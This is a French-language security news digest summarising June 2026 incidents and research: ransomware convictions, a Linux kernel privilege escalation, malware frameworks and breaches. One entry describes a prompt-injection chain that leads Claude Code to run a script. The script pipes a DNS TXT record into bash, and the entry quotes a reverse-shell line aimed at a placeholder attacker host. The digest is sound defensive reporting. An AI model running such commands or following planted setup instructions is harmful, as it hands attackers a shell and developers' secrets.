Deux membres de Scattered Spider condamnés pour l'attaque contre Transport for London

đŸ›ïž Contexte Le 22 juin 2026, la National Crime Agency (NCA) britannique a annoncĂ© la condamnation de deux cybercriminels ayant attaquĂ© le rĂ©seau informatique de Transport for London (TfL). L’article est publiĂ© sur le site officiel de la NCA. đŸ‘€ Acteurs identifiĂ©s Thalha Jubair, 20 ans, originaire de l’Est de Londres Owen Flowers, 18 ans, originaire de Walsall, West Midlands Tous deux membres du collectif criminel en ligne Scattered Spider đŸ—“ïž Chronologie 31 aoĂ»t – 3 septembre 2024 : infiltration du rĂ©seau de TfL 6 septembre 2024 : premiĂšre arrestation de Flowers pour l’attaque TfL 16 septembre 2024 : arrestation des deux individus Ă  leur domicile par la NCA et la City of London Police (COLP) Mars et mai 2025 : Flowers viole ses conditions de libertĂ© sous caution Ă  deux reprises 22 juin 2026 : les deux accusĂ©s plaident coupable au Woolwich Crown Court 16 juillet : date prĂ©vue pour le prononcĂ© de la peine đŸ’„ Impact de l’attaque 29 millions de livres sterling de pertes et coĂ»ts de rĂ©cupĂ©ration pour TfL Les 28 000 employĂ©s de TfL ont dĂ» se rendre physiquement dans un bureau pour rĂ©initialiser leur mot de passe AccĂšs aux donnĂ©es du systĂšme de remboursements Oyster Perturbation du systĂšme de remboursement clients Fermeture du systĂšme de demande de photocards Oyster pour enfants et jeunes đŸ„ Victimes supplĂ©mentaires Lors de l’arrestation de Flowers, des preuves ont Ă©tĂ© trouvĂ©es indiquant l’infiltration et l’endommagement des rĂ©seaux de deux entreprises amĂ©ricaines de santĂ© : ...

29 juin 2026 Â· 3 min

DirtyClone (CVE-2026-43503) : LPE Linux via corruption du page cache par IPsec

🔍 Contexte PubliĂ© le 25 juin 2026 par les chercheurs Eddy Tsalolikhin et Or Peles de JFrog Security Research, cet article prĂ©sente une analyse technique approfondie de DirtyClone, une nouvelle variante de la famille de vulnĂ©rabilitĂ©s DirtyFrag affectant le noyau Linux. La vulnĂ©rabilitĂ© est rĂ©fĂ©rencĂ©e CVE-2026-43503 (CVSS 8.8, sĂ©vĂ©ritĂ© haute). 🧬 Famille de vulnĂ©rabilitĂ©s DirtyFrag DirtyFrag est une famille de vulnĂ©rabilitĂ©s de corruption mĂ©moire dans la pile rĂ©seau du noyau Linux, exploitant l’intersection entre : ...

29 juin 2026 Â· 3 min

FortiBleed : infrastructure d'un courtier d'accĂšs initial ciblant Fortinet, Synology, Sophos et MSSQL

🔍 Contexte PubliĂ© le 19 juin 2026 par SpyCloud Labs, cet article prĂ©sente une analyse technique approfondie de l’infrastructure opĂ©rationnelle du groupe Ă  l’origine du dataset « FortiBleed », initialement dĂ©couvert par le chercheur Volodymyr « Bob » Diachenko. SpyCloud a obtenu une copie des donnĂ©es et les a analysĂ©es contre son schĂ©ma de brĂšches. 🎯 Nature de la campagne La campagne, active depuis le 19 mai 2026, est opĂ©rĂ©e par un courtier d’accĂšs initial (IAB) russophone utilisant des techniques de mass-scanning et brute-force (spray-and-pray) contre des Ă©quipements exposĂ©s sur Internet : ...

29 juin 2026 Â· 4 min

Injection de prompt indirecte via DNS TXT : compromission totale via Claude Code à l'ouverture d'un dépÎt

🔍 Contexte PubliĂ© le 25 juin 2026 par Andre Hall & Miller Engelbrecht sur le blog de 0DIN (plateforme de bug bounty IA de Mozilla), cet article prĂ©sente une dĂ©monstration technique d’une attaque par injection de prompt indirecte ciblant les outils de dĂ©veloppement agentiques, en particulier Claude Code d’Anthropic. ⚙ MĂ©canisme de l’attaque L’attaque repose sur trois composants enchaĂźnĂ©s, chacun individuellement bĂ©nin : Un dĂ©pĂŽt GitHub normal : un fichier README ou issue dĂ©crit une procĂ©dure d’initialisation standard (pip3 install -r requirements.txt puis python3 -m axiom init). Un package Python qui Ă©choue intentionnellement : le module axiom lĂšve une RuntimeError s’il n’est pas initialisĂ©, incitant l’agent Ă  exĂ©cuter python3 -m axiom init comme correction de routine. Un script d’initialisation qui rĂ©sout un enregistrement DNS TXT : scripts/setup.sh exĂ©cute dig +short TXT _axiom-config.m100.cloud @1.1.1.1 et passe le rĂ©sultat Ă  bash -c. L’enregistrement DNS contient un reverse shell encodĂ© en base64 (bash -i >& /dev/tcp/<attacker-host>/4443 0>&1). đŸ’„ Impact Shell interactif s’exĂ©cutant avec les droits de l’utilisateur dĂ©veloppeur Exfiltration de secrets d’environnement : ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN PossibilitĂ© de persistance (clĂ© SSH, cron job, backdoor) Le payload est invisible : absent du dĂ©pĂŽt, non dĂ©tectable par les scanners statiques, jamais Ă©valuĂ© par l’agent avant exĂ©cution Le payload peut ĂȘtre modifiĂ© Ă  tout moment en Ă©ditant l’enregistrement DNS, sans aucun commit 🎯 Vecteur de diffusion Un simple lien vers le dĂ©pĂŽt partagĂ© dans une offre d’emploi, un tutoriel ou un message Slack suffit Ă  compromettre tout dĂ©veloppeur ouvrant le projet avec Claude Code. ...

29 juin 2026 Â· 3 min

KDDI : violation de données exposant jusqu'à 14,2 millions de comptes email au Japon

📰 Source : BleepingComputer — Date de publication : 28 juin 2026 Contexte KDDI Corporation, l’un des plus grands opĂ©rateurs tĂ©lĂ©com japonais (45 000 employĂ©s, 32,4 milliards USD de revenus annuels), a divulguĂ© une violation de donnĂ©es affectant un systĂšme email centralisĂ© utilisĂ© par cinq fournisseurs d’accĂšs Ă  Internet (FAI) partenaires. DĂ©roulement de l’incident La compromission a Ă©tĂ© dĂ©couverte le 17 juin par KDDI. Les attaquants ont exploitĂ© une vulnĂ©rabilitĂ© dans un logiciel tiers non nommĂ© dĂ©ployĂ© sur le systĂšme KDDI. KDDI a immĂ©diatement bloquĂ© l’accĂšs non autorisĂ© et mis en place des mesures dĂ©fensives. Les autoritĂ©s compĂ©tentes ont Ă©tĂ© notifiĂ©es : Personal Information Protection Commission et Ministry of Internal Affairs and Communications. PĂ©rimĂštre d’impact Les cinq FAI affectĂ©s sont : ...

29 juin 2026 Â· 2 min

KHAOS C2 : nouveau framework post-exploitation avec 5 canaux furtifs et évasion complÚte

🔍 Contexte PubliĂ© le 29 juin 2026 sur GitHub par l’utilisateur 28Zaaky, le dĂ©pĂŽt khaos-c2 prĂ©sente KHAØS, un framework de command-and-control (C2) post-exploitation open-source sous licence MIT. Le projet compte 109 Ă©toiles et 19 forks au moment de la publication. Le code est principalement Ă©crit en C (91,6%), avec des composants JavaScript, Python et PowerShell. 🎯 Description du framework KHAØS est conçu pour contourner les solutions EDR en s’appuyant sur plusieurs mĂ©canismes d’évasion : ...

29 juin 2026 Â· 4 min

Klue : le groupe Icarus supprime les données volées, mais un second groupe extorque les clients

📰 Source : TechCrunch, article de Lorenzo Franceschi-Bicchierai publiĂ© le 25 juin 2026. L’article rapporte les dĂ©veloppements post-incident concernant la violation de donnĂ©es subie par Klue, fournisseur de market intelligence. đŸ—“ïž Chronologie de l’incident 12 juin 2026 : intrusion dans les systĂšmes de Klue Lundi (date non prĂ©cisĂ©e) : Klue confirme publiquement la violation Mercredi soir : mise Ă  jour privĂ©e envoyĂ©e aux clients Jeudi matin : site du groupe Icarus hors ligne 🎯 Vecteur d’attaque initial Les attaquants ont utilisĂ© un credential tiers datant de 2022, issu d’un pilote limitĂ© et jamais rĂ©voquĂ©. Ce credential a permis d’accĂ©der aux systĂšmes de Klue, puis de dĂ©rober des tokens d’authentification OAuth pour s’introduire dans les clouds et bases de donnĂ©es des clients. ...

29 juin 2026 Â· 2 min

La Linux Foundation lance Akrites, un cadre de sécurité pour les logiciels open source critiques

📰 Source : Help Net Security — Date : 26 juin 2026 🔍 Contexte Face Ă  l’accĂ©lĂ©ration du dĂ©lai entre la dĂ©couverte d’une faille et son exploitation — phĂ©nomĂšne amplifiĂ© par l’IA — la Linux Foundation a annoncĂ© le lancement d’Akrites, une initiative industrielle dĂ©diĂ©e Ă  la sĂ©curitĂ© des logiciels open source critiques. đŸ—ïž Nature de l’initiative Akrites rassemble plusieurs catĂ©gories d’acteurs : Entreprises technologiques Institutions financiĂšres Éditeurs de solutions de sĂ©curitĂ© Entreprises spĂ©cialisĂ©es en IA Projets open source 🎯 Objectifs L’initiative vise Ă  Ă©tablir un processus commun pour la remĂ©diation et la divulgation des vulnĂ©rabilitĂ©s affectant les logiciels open source Ă  large diffusion. Elle entend rĂ©pondre Ă  la rĂ©duction du temps entre dĂ©couverte et exploitation des failles, accĂ©lĂ©rĂ©e par les capacitĂ©s de l’IA. ...

29 juin 2026 Â· 2 min

Millenium RAT v4 : migration vers C++, MaaS Ă  50$/mois, 62 000 endpoints compromis

🔍 Contexte PubliĂ© le 25 juin 2026 par Group-IB (blog officiel), cet article prĂ©sente une analyse technique approfondie du Millenium RAT version 4.*, un cheval de Troie d’accĂšs Ă  distance (RAT) initialement documentĂ© par CYFIRMA en novembre 2023 (version 2.4). L’analyse couvre l’évolution architecturale du malware, son modĂšle de distribution, les campagnes actives et la victimologie mondiale. đŸ—ïž Évolution architecturale majeure La version 4.* marque un changement architectural critique : le malware abandonne le framework .NET au profit d’une application native C++, supprimant toute dĂ©pendance au runtime .NET. La communication C2 repose exclusivement sur l’API Telegram Bot via libcurl, sans infrastructure serveur dĂ©diĂ©e. La configuration est chargĂ©e depuis une ressource PE embarquĂ©e (RCDATA), encodĂ©e en Base64 et chiffrĂ©e via un algorithme XOR personnalisĂ© avec mot de passe intĂ©grĂ© dans le PE. ...

29 juin 2026 Â· 6 min

RoguePlanet et GreatXML : élévation de privilÚges et contournement BitLocker sous Windows

🔍 Contexte PubliĂ© le 17 juin 2026 par Serhii Melnyk (LevelBlue SpiderLabs), cet article prĂ©sente une analyse technique approfondie de deux preuves de concept (PoC) publiĂ©es sous les alias Nightmare-Eclipse / MSNightmare, peu aprĂšs le Patch Tuesday de juin 2026 de Microsoft. 🚀 RoguePlanet : ÉlĂ©vation de privilĂšges locale via Microsoft Defender RoguePlanet est une technique d’élĂ©vation de privilĂšges locale (LPE) permettant Ă  un utilisateur standard d’obtenir une exĂ©cution en contexte SYSTEM sans exploitation noyau ni corruption mĂ©moire. Elle repose sur une chaĂźne en 7 Ă©tapes orchestrant des composants Windows lĂ©gitimes : ...

29 juin 2026 Â· 4 min
DerniĂšre mise Ă  jour le: 11 aoĂ»t 2026 📝